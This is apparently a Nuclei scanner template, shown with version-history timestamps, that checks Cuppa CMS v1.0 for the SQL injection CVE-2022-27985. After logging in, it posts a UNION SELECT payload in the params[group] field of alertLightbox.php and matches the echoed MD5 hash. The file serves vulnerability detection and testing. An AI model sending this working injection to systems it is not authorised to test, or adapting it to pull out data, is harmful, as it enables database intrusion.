2023-05-06 12:12:20 +00:00
|
|
|
id: CVE-2022-27985
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Cuppa CMS v1.0 - SQL injection
|
|
|
|
author: theamanrawat
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.
|
2023-05-06 12:12:20 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/CuppaCMS/CuppaCMS
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-27985
|
2023-07-11 19:49:27 +00:00
|
|
|
- http://cuppa.com
|
|
|
|
- http://www.cuppacms.com/
|
2023-05-06 12:12:20 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2022-27985
|
|
|
|
cwe-id: CWE-89
|
2023-10-22 12:16:24 +00:00
|
|
|
epss-score: 0.01382
|
2023-10-26 18:00:24 +00:00
|
|
|
epss-percentile: 0.84866
|
2023-09-06 11:59:08 +00:00
|
|
|
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
|
2023-05-06 12:12:20 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 11:59:08 +00:00
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: cuppacms
|
|
|
|
product: cuppacms
|
2023-05-06 12:12:20 +00:00
|
|
|
tags: cve,cve2022,sqli,cuppa,authenticated
|
|
|
|
variables:
|
|
|
|
num: '999999999'
|
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST / HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
user={{username}}&password={{password}}&language=en&task=login
|
|
|
|
- |
|
|
|
|
POST /alerts/alertLightbox.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
|
|
|
|
url=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile¶ms%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-¶ms%5Breference%5D=41&uniqueClass=new_content_3983163
|
|
|
|
|
|
|
|
cookie-reuse: true
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2023-05-06 12:12:20 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '{{md5(num)}}'
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-27 06:32:23 +00:00
|
|
|
# digest: 4a0a0047304502201691228f5e237b632787e2a9c456bc013cffec88e15a5be40a6455ece09652d8022100901acf3db66b9c3238996e2e20c9c5db8f452cf2111876c090c8b604b7438d62:922c64590222798bb761d5b6d8e72950
|